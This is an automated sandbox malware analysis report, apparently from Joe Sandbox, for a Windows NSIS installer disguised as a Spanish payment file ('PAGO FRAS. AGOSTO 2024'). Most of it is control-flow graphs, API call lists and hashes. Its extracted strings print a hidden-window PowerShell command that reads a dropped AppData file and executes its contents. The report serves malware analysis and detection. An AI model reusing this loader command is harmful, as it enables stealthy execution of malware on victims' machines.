                                                                              • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)","powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets,00000000,00000000,00000031), ref: 004017BA
                                                                                • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Blaggard Setup,NSIS Error), ref: 00405D3C
                                                                                • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
                                                                                • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"$Arabisation\argumenta\dekaderne$C:\Users\user\AppData\Local\Temp\Vedlgges.Fam$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets
                                                                              • API String ID: 1941528284-1744067590
                                                                              • Opcode ID: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                              • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                              • Opcode Fuzzy Hash: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                              • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 692 402e9f-402eb3 693 402eb5 692->693 694 402ebc-402ec5 692->694 693->694 695 402ec7 694->695 696 402ece-402ed3 694->696 695->696 697 402ee3-402ef0 call 4030b1 696->697 698 402ed5-402ede call 4030c7 696->698 702 402ef6-402efa 697->702 703 40309f 697->703 698->697 704 402f00-402f49 GetTickCount 702->704 705 40304a-40304c 702->705 706 4030a1-4030a2 703->706 709 4030a7 704->709 710 402f4f-402f57 704->710 707 40308c-40308f 705->707 708 40304e-403051 705->708 711 4030aa-4030ae 706->711 712 403091 707->712 713 403094-40309d call 4030b1 707->713 708->709 714 403053 708->714 709->711 715 402f59 710->715 716 402f5c-402f6a call 4030b1 710->716 712->713 713->703 725 4030a4 713->725 719 403056-40305c 714->719 715->716 716->703 724 402f70-402f79 716->724 722 403060-40306e call 4030b1 719->722 723 40305e 719->723 722->703 729 403070-40307c call 405a49 722->729 723->722 728 402f7f-402f9f call 4061ab 724->728 725->709 734 403042-403044 728->734 735 402fa5-402fb8 GetTickCount 728->735 736 403046-403048 729->736 737 40307e-403088 729->737 734->706 738 402fba-402fc2 735->738 739 402ffd-402fff 735->739 736->706 737->719 740 40308a 737->740 741 402fc4-402fc8 738->741 742 402fca-402ffa MulDiv wsprintfA call 404f48 738->742 743 403001-403005 739->743 744 403036-40303a 739->744 740->709 741->739 741->742 742->739 747 403007-40300e call 405a49 743->747 748 40301c-403027 743->748 744->710 745 403040 744->745 745->709 752 403013-403015 747->752 749 40302a-40302e 748->749 749->728 753 403034 749->753 752->736 754 403017-40301a 752->754 753->709 754->749
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: DA$ DA$... %d%%$DwA
                                                                              • API String ID: 551687249-506594815
                                                                              • Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                              • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                              • Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                              • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 755 40540e-405459 CreateDirectoryA 756 40545b-40545d 755->756 757 40545f-40546c GetLastError 755->757 758 405486-405488 756->758 757->758 759 40546e-405482 SetFileSecurityA 757->759 759->756 760 405484 GetLastError 759->760 760->758
                                                                              APIs
                                                                              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                              • GetLastError.KERNEL32 ref: 00405465
                                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                              • GetLastError.KERNEL32 ref: 00405484
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                              • API String ID: 3449924974-3946084282
                                                                              • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                              • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                              • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                              • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 761 40605a-40607a GetSystemDirectoryA 762 40607c 761->762 763 40607e-406080 761->763 762->763 764 406090-406092 763->764 765 406082-40608a 763->765 767 406093-4060c5 wsprintfA LoadLibraryExA 764->767 765->764 766 40608c-40608e 765->766 766->767
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                              • wsprintfA.USER32 ref: 004060AA
                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-4240819195
                                                                              • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                              • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                              • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                              • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 768 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 775 4023b0-4023b8 768->775 776 4028cf-4028de 768->776 777 4023c8-4023cb 775->777 778 4023ba-4023c7 call 402a3a lstrlenA 775->778 782 4023db-4023de 777->782 783 4023cd-4023da call 402a1d 777->783 778->777 784 4023e0-4023ea call 402e9f 782->784 785 4023ef-402403 RegSetValueExA 782->785 783->782 784->785 789 402405 785->789 790 402408-4024de RegCloseKey 785->790 789->790 790->776
                                                                              APIs
                                                                              • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                              • lstrlenA.KERNEL32(Arabisation\argumenta\dekaderne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                              • RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateValuelstrlen
                                                                              • String ID: Arabisation\argumenta\dekaderne
                                                                              • API String ID: 1356686001-2217045471
                                                                              • Opcode ID: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                              • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                              • Opcode Fuzzy Hash: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                              • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 793 4059d1-4059db 794 4059dc-405a07 GetTickCount GetTempFileNameA 793->794 795 405a16-405a18 794->795 796 405a09-405a0b 794->796 798 405a10-405a13 795->798 796->794 797 405a0d 796->797 797->798
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 004059E5
                                                                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                              Strings
                                                                              • "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 004059D1
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                              • nsa, xrefs: 004059DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-2727501780
                                                                              • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                              • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                              • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                              • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 799 401bca-401be2 call 402a1d * 2 804 401be4-401beb call 402a3a 799->804 805 401bee-401bf2 799->805 804->805 806 401bf4-401bfb call 402a3a 805->806 807 401bfe-401c04 805->807 806->807 811 401c06-401c1a call 402a1d * 2 807->811 812 401c4a-401c70 call 402a3a * 2 FindWindowExA 807->812 823 401c3a-401c48 SendMessageA 811->823 824 401c1c-401c38 SendMessageTimeoutA 811->824 822 401c76 812->822 825 401c79-401c7c 822->825 823->822 824->825 826 401c82 825->826 827 4028cf-4028de 825->827 826->827
                                                                              APIs
                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                              • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                              • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                              • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 830 401f90-401f9c 831 401fa2-401fb8 call 402a3a * 2 830->831 832 402057-402059 830->832 841 401fc7-401fd5 LoadLibraryExA 831->841 842 401fba-401fc5 GetModuleHandleA 831->842 833 4021c4-4021c9 call 401423 832->833 840 4028cf-4028de 833->840 844 401fd7-401fe4 GetProcAddress 841->844 845 402050-402052 841->845 842->841 842->844 847 402023-402028 call 404f48 844->847 848 401fe6-401fec 844->848 845->833 852 40202d-402030 847->852 850 402005-402021 848->850 851 401fee-401ffa call 401423 848->851 850->852 851->852 861 401ffc-402003 851->861 852->840 854 402036-40203e call 40364f 852->854 854->840 860 402044-40204b FreeLibrary 854->860 860->840 861->852
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
                                                                                • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 2987980305-0
                                                                              • Opcode ID: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                              • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                              • Opcode Fuzzy Hash: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                              • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                              APIs
                                                                                • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets,00000000,00000000,000000F0), ref: 00401634
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets, xrefs: 00401629
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                              • String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets
                                                                              • API String ID: 1892508949-1810565758
                                                                              • Opcode ID: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                              • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
